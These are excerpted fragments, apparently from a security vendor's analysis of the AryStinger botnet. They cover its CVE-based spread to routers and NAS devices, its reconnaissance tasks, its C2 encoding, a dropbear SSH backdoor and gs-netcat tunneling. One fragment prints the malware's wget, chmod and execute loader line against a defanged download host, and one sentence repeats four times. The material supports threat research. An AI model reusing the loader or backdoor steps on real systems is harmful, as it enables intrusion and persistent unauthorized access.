AryStinger

build reconnaissance and attack clusters for use in the pre-intrusion footprinting stage... With this distributed-like design, the attacker can efficiently complete the early 'footprinting' activities

AryStinger implements scanning functionality similar to massdns... this issuance is a .ba top-level domain brute-force task... After receiving this instruction, the actual Bot will launch a scan against the .ba top-level domain

The attackers exploited vulnerabilities disclosed 13 years ago to compromise a large number of old routers... spreading a VT 0-detection ELF sample implemented in C through the old vulnerabilities CVE-2013-3307 and CVE-2016-5681... On April 26, we captured a homologous sample targeting NAS devices, spread through CVE-2025-11837.

AryStinger supports multiple task types, including... system command execution, source-level Payloads in three languages—Go/Java/Python... ScriptWork supports executing Shell commands as well as source-level Payloads in three categories: Go, Java, and Python.

ScriptWork supports executing Shell commands as well as source-level Payloads in three categories: Go, Java, and Python.

ScriptWork supports executing Shell commands as well as source-level Payloads in three categories: Go, Java, and Python.

ScriptWork supports executing Shell commands as well as source-level Payloads in three categories: Go, Java, and Python.

this campaign aims to build an infrastructure cluster for intrusion reconnaissance activities, possessing information-gathering capabilities such as port scanning, service identification, and subdomain enumeration... supports multiple task types, including internal/external network scanning | possessing information-gathering capabilities such as port scanning, service identification... In addition to IP scanning, DNS scanning, and HTTP Alive scanning, it also integrates penetration tools such as fscan, ksubdomain, httpx, and Tlsx

The Bot collects the device's fingerprint information... including the MAC address, device name, public address, internal address, operating system version, CPU architecture, current timestamp, and so on.

The Bot downloads dropbear... starts the dropbear SSH service on a specific local port, and configures iptables to allow traffic on that port, thereby establishing a persistent remote login backdoor for the attacker.

AryStinger builds powerful intranet reconnaissance capabilities by integrating open-source tools such as Fscan and Ksubdomain... where it saves its downloaded open-source toolset and the scan results

Network traffic is encoded using Protobuf and supplemented with simple XOR encryption... AryStinger Standard hardcodes two C2 addresses... Its data packets are serialized using Protobuf, then Gzip-compressed and XOR-encrypted.

AryStinger is a typical bot. It communicates with the C2 server over HTTP/HTTPS protocols. Network traffic is encoded using Protobuf and supplemented with simple XOR encryption.

AryStinger supports multiple task types, including internal/external network scanning, traffic tunnel forwarding/proxying... TUNNEL (Tunnel Penetration) Provides tunnel functionality, used to proxy or forward network traffic.

Its function is to first obtain the latest version number from the download server hgodpcx[.]ajb8.com, then download and execute the corresponding AryStinger sample... wget -q -O "${BIN_PATH}" "${SRC_URL}" ... chmod +x "${BIN_PATH}" ... "${BIN_PATH}" -b "${CTX}"

the Standard version achieves it by downloading and deploying gs-netcat through main_installGSocket.